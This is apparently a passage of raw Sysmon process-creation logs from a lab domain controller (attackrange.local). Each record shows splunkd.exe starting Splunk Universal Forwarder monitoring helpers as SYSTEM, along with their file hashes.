Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039645Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:20.544{A8622C2F-51BC-6078-6207-00000000AE01}616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039635Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:19.869{A8622C2F-51BB-6078-6107-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039625Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:18.030{A8622C2F-51BA-6078-6007-00000000AE01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:17.365{A8622C2F-51B9-6078-5F07-00000000AE01}2576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039605Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:16.686{A8622C2F-51B8-6078-5E07-00000000AE01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:22.985{A8622C2F-5182-6078-5D07-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039516Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:21.093{A8622C2F-5181-6078-5C07-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:20.519{A8622C2F-5180-6078-5B07-00000000AE01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039497Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:19.852{A8622C2F-517F-6078-5A07-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039486Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:18.041{A8622C2F-517E-6078-5907-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039475Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:17.377{A8622C2F-517D-6078-5807-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039467Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:16.696{A8622C2F-517C-6078-5707-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:22.982{A8622C2F-5146-6078-5607-00000000AE01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:21.184{A8622C2F-5145-6078-5507-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:20.518{A8622C2F-5144-6078-5407-00000000AE01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:19.836{A8622C2F-5143-6078-5307-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:18.074{A8622C2F-5142-6078-5207-00000000AE01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039298Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:17.407{A8622C2F-5141-6078-5107-00000000AE01}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039288Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:44:16.732{A8622C2F-5140-6078-5007-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:22.986{A8622C2F-510A-6078-4F07-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039183Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:21.134{A8622C2F-5109-6078-4E07-00000000AE01}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:20.467{A8622C2F-5108-6078-4D07-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039162Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:19.834{A8622C2F-5107-6078-4C07-00000000AE01}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039141Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:18.014{A8622C2F-5106-6078-4B07-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039130Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:17.394{A8622C2F-5105-6078-4A07-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:43:16.727{A8622C2F-5104-6078-4907-00000000AE01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039032Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:22.973{A8622C2F-50CE-6078-4807-00000000AE01}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:21.167{A8622C2F-50CD-6078-4707-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039004Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:20.501{A8622C2F-50CC-6078-4607-00000000AE01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038994Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:19.834{A8622C2F-50CB-6078-4507-00000000AE01}5008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:18.052{A8622C2F-50CA-6078-4407-00000000AE01}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038974Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:17.388{A8622C2F-50C9-6078-4307-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038964Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:42:16.718{A8622C2F-50C8-6078-4207-00000000AE01}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 